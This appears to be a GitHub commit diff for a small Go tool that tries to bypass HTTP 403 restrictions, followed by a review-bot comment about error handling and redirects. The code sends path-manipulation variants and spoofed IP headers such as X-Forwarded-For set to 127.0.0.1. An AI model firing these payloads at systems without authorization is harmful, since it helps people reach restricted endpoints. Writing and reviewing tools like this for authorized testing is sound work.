Merge pull request #1 from ClavinJune/main

Improve Code, Add Goroutine
main
Muhammad Daffa 2021-07-18 19:52:23 +07:00 committed by GitHub
commit 9c1edf9fc7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 125 additions and 73 deletions

2
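--- a/Makefile
+++ b/Makefile
@@ -0,0 +1,2 @@
+fmt:
+@gofmt -w -s main.go && goimports -w main.go && go vet main.go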

196
main.go

@ -1,46 +1,21 @@
package main
import (
"context"
"flag"
"fmt"
"log"
"net/http"
"os"
"regexp"
"runtime"
"strings"
"sync"
"time"
)
var Red = "\033[31m"
var Green = "\033[32m"
var White = "\033[97m"
func main() {
domain := flag.String("url", "", "A domain with the protocol. Example: https://daffa.tech")
path := flag.String("path", "", "An endpoint. Example: admin")
flag.Parse()
if *domain == "" || *path == "" {
log.Fatalln("Using flag -url and -path")
os.Exit(0)
}
upperCase := strings.ToUpper(*path)
endpoint := []string{
*domain + "/" + upperCase,
*domain + "/" + *path + "/",
*domain + "/" + *path + "/.",
*domain + "//" + *path + "//",
*domain + "/./" + *path + "/./",
*domain + "/./" + *path + "/..",
*domain + "/;/" + *path,
*domain + "/.;/" + *path,
*domain + "//;//" + *path,
*domain + "/" + *path + "..;/",
*domain + "/%2e/" + *path,
*domain + "/%252e/" + *path,
*domain + "/%ef%bc%8f" + *path}
headers := []string{
var (
reURL = regexp.MustCompile("^https?://")
headerPayloads = []string{
"X-Custom-IP-Authorization",
"X-Originating-IP",
"X-Forwarded-For",
@ -49,52 +24,127 @@ func main() {
"X-Host",
"X-Forwarded-Host",
"X-ProxyUser-Ip",
"X-Remote-Addr"}
"X-Remote-Addr",
}
)
fmt.Println(Green, " _ _ ___ ____ ____ ")
fmt.Println(Green, "| || | / _ \\___ \\ | _ \\ ")
fmt.Println(Green, "| || |_| | | |__) |_____| |_) |_ _ _ __ __ _ ___ ___ ___ _ __ ")
fmt.Println(Green, "|__ _| | | |__ <______| _ <| | | | '_ \\ / _` / __/ __|/ _ \\ '__| ")
fmt.Println(Green, " | | | |_| |__) | | |_) | |_| | |_) | (_| \\__ \\__ \\ __/ | ")
fmt.Println(Green, " |_| \\___/____/ |____/ \\__, | .__/ \\__,_|___/___/\\___|_| ")
fmt.Println(Green, " __/ | | ")
fmt.Println(Green, " |___/|_| v1.0.2", White)
const (
version string = "v1.1.0"
red string = "\033[31m"
green string = "\033[32m"
white string = "\033[97m"
fmt.Println("\nDomain:", *domain)
fmt.Println("Path:", *path)
headerValue string = "127.0.0.1"
)
fmt.Println("\nNormal Request")
for i, str := range endpoint {
req, err := http.Get(str)
if err != nil {
log.Fatal(err)
}
output := fmt.Sprintf("%s %d %s", str, req.StatusCode, http.StatusText(req.StatusCode))
if req.StatusCode == 200 {
fmt.Println(Green, i+1, output, White)
} else {
fmt.Println(Red, i+1, output, White)
}
func showBanner() {
fmt.Printf("%s %s %s %s %s %s %s %s %s %s %s\n", green,
" _ _ ___ ____ ____\n",
"| || | / _ \\___ \\ | _ \\\n",
"| || |_| | | |__) |_____| |_) |_ _ _ __ __ _ ___ ___ ___ _ __\n",
"|__ _| | | |__ <______| _ <| | | | '_ \\ / _` / __/ __|/ _ \\ '__|\n",
" | | | |_| |__) | | |_) | |_| | |_) | (_| \\__ \\__ \\ __/ |\n",
" |_| \\___/____/ |____/ \\__, | .__/ \\__,_|___/___/\\___|_|\n",
" __/ | |\n",
" |___/|_| ",
version, white)
}
func getValidDomain(domain string) string {
trimmedDomain := strings.TrimSpace(domain)
if !reURL.MatchString(trimmedDomain) {
trimmedDomain = "https://" + trimmedDomain
}
fmt.Println("\nRequest with Headers")
for j, head := range headers {
req2, err := http.NewRequest("GET", *domain+"/"+*path, nil)
if err != nil {
log.Fatal(err)
}
req2.Header.Set(head, "127.0.0.1")
resp, err := http.DefaultClient.Do(req2)
if err != nil {
log.Fatal(err)
}
output2 := fmt.Sprintf("%s %s %d %s", head, *domain+"/"+*path, resp.StatusCode, http.StatusText(resp.StatusCode))
return trimmedDomain
}
if resp.StatusCode == 200 {
fmt.Println(Green, j+1, output2, White)
} else {
fmt.Println(Red, j+1, output2, White)
}
func constructEndpointPayloads(domain, path string) []string {
return []string{
domain + "/" + strings.ToUpper(path),
domain + "/" + path + "/",
domain + "/" + path + "/.",
domain + "//" + path + "//",
domain + "/./" + path + "/./",
domain + "/./" + path + "/..",
domain + "/;/" + path,
domain + "/.;/" + path,
domain + "//;//" + path,
domain + "/" + path + "..;/",
domain + "/%2e/" + path,
domain + "/%252e/" + path,
domain + "/%ef%bc%8f" + path,
}
}
func penetrateEndpoint(wg *sync.WaitGroup, url string, header ...string) {
ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
defer cancel()
defer wg.Done()
req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)
if err != nil {
log.Fatal(err)
}
var h string
if header != nil {
h = header[0]
req.Header.Set(h, headerValue)
}
resp, err := http.DefaultClient.Do(req)
if err != nil {
log.Fatal(err)
}
defer resp.Body.Close()
color := green
if resp.StatusCode != 200 {
color = red
}
log.Println(color, h, url, resp.StatusCode, http.StatusText(resp.StatusCode), white)
}
func main() {
runtime.GOMAXPROCS(1)
domain := flag.String("url", "", "A domain with the protocol. Example: https://daffa.tech")
path := flag.String("path", "", "An endpoint. Example: admin")
flag.Parse()
if *domain == "" || *path == "" {
log.Fatalln("Using flag -url and -path")
}
validDomain := getValidDomain(*domain)
validPath := strings.TrimSpace(*path)
endpoints := constructEndpointPayloads(validDomain, validPath)
showBanner()
fmt.Println("\nDomain:", validDomain)
fmt.Println("Path:", validPath)
fmt.Println("\nNormal Request")
var wg sync.WaitGroup
wg.Add(len(endpoints))
for _, e := range endpoints {
go penetrateEndpoint(&wg, e)
}
wg.Wait()
fmt.Println("\nRequest with Headers")
wg.Add(len(headerPayloads))
for _, h := range headerPayloads {
go penetrateEndpoint(&wg, validDomain+"/"+validPath, h)
}
wg.Wait()
}
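Review bot: In penetrateEndpoint both `log.Fatal(err)` calls now run inside a goroutine, so one failed request (a timeout, a reset connection, a server that drops one of the malformed path variants) exits the whole process. The deferred `wg.Done()`, `cancel()` and `resp.Body.Close()` never run, and the results of the other in-flight requests are lost. Reporting the error for that URL and returning keeps the rest of the run intact, e.g. `log.Println(red, h, url, err, white)` followed by `return`. Separately, `http.DefaultClient` follows redirects, so a variant answered with a redirect to a login page that returns 200 is printed green. A green line therefore needs manual confirmation, or a client whose `CheckRedirect` returns `http.ErrUseLastResponse` so the first status code is the one reported.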